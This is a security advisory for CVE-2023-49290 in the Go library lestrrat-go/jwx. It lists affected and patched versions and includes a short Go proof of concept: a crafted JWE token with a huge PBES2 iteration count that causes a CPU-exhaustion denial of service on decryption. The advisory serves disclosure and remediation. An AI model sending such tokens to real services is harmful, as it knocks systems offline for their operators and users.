---
id: CVE-2023-49290
aliases:
  - GHSA-7f9x-gw85-8grf
  - GO-2023-2379
title: lestrrat-go/jwx's malicious parameters in JWE can cause a DOS
summary: lestrrat-go/jwx's malicious parameters in JWE can cause a DOS
severity: medium
cvss: 5.3
cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'
vendor: lestrrat-go
product: github.com/lestrrat-go/jwx
ecosystem: go
affected:
  - github.com/lestrrat-go/jwx < 1.2.27
  - github.com/lestrrat-go/jwx/v2 < 2.0.18
patched:
  - github.com/lestrrat-go/jwx 1.2.27
  - github.com/lestrrat-go/jwx/v2 2.0.18
published: '2023-12-05'
updated: '2026-09-10'
sourceUpdated: '2026-09-10T03:49:59.444603643Z'
source: OSV
sourceUrl: 'https://osv.dev/vulnerability/GHSA-7f9x-gw85-8grf'
references:
  - url: 'https://github.com/lestrrat-go/jwx/security/advisories/GHSA-7f9x-gw85-8grf'
  - url: 'https://nvd.nist.gov/vuln/detail/CVE-2023-49290'
  - url: >-
      https://github.com/lestrrat-go/jwx/commit/64f2a229b8e18605f47361d292b526bdc4aee01c
  - url: 'https://github.com/lestrrat-go/jwx'
tags:
  - osv
  - go
epss: 0.00729
epssPercentile: 0.52358
ingestedAt: '2026-09-12T03:13:01.763Z'
---

## Overview

### Summary
too high p2c parameter in JWE's alg PBES2-* could lead to a DOS attack

### Details
The JWE key management algorithms based on PBKDF2 require a JOSE Header Parameter called p2c (PBES2 Count). This parameter dictates the number of PBKDF2 iterations needed to derive a CEK wrapping key. Its primary purpose is to intentionally slow down the key derivation function, making password brute-force and dictionary attacks more resource- intensive.
Therefore, if an attacker sets the p2c parameter in JWE to a very large number, it can cause a lot of computational consumption, resulting in a DOS attack

### PoC
```go
package main

import (
	"fmt"
	"github.com/lestrrat-go/jwx/v2/jwa"
	"github.com/lestrrat-go/jwx/v2/jwe"
	"github.com/lestrrat-go/jwx/v2/jwk"
)

func main() {
	token := []byte("eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMjU2R0NNIiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJNNzczSnlmV2xlX2FsSXNrc0NOTU9BIn0=.S8B1kXdIR7BM6i_TaGsgqEOxU-1Sgdakp4mHq7UVhn-_REzOiGz2gg.gU_LfzhBXtQdwYjh.9QUIS-RWkLc.m9TudmzUoCzDhHsGGfzmCA")
	key, err := jwk.FromRaw([]byte(`abcdefg`))
	payload, err := jwe.Decrypt(token, jwe.WithKey(jwa.PBES2_HS256_A128KW, key))
	if err == nil {
		fmt.Println(string(payload))
	}
}

```

### Impact
It's a kind of Dos attack, the user's environment could potentially utilize an excessive amount of CPU resources.


## Affected packages

- `github.com/lestrrat-go/jwx < 1.2.27`
- `github.com/lestrrat-go/jwx/v2 < 2.0.18`

## Remediation

Upgrade to a patched release:

- `github.com/lestrrat-go/jwx 1.2.27`
- `github.com/lestrrat-go/jwx/v2 2.0.18`
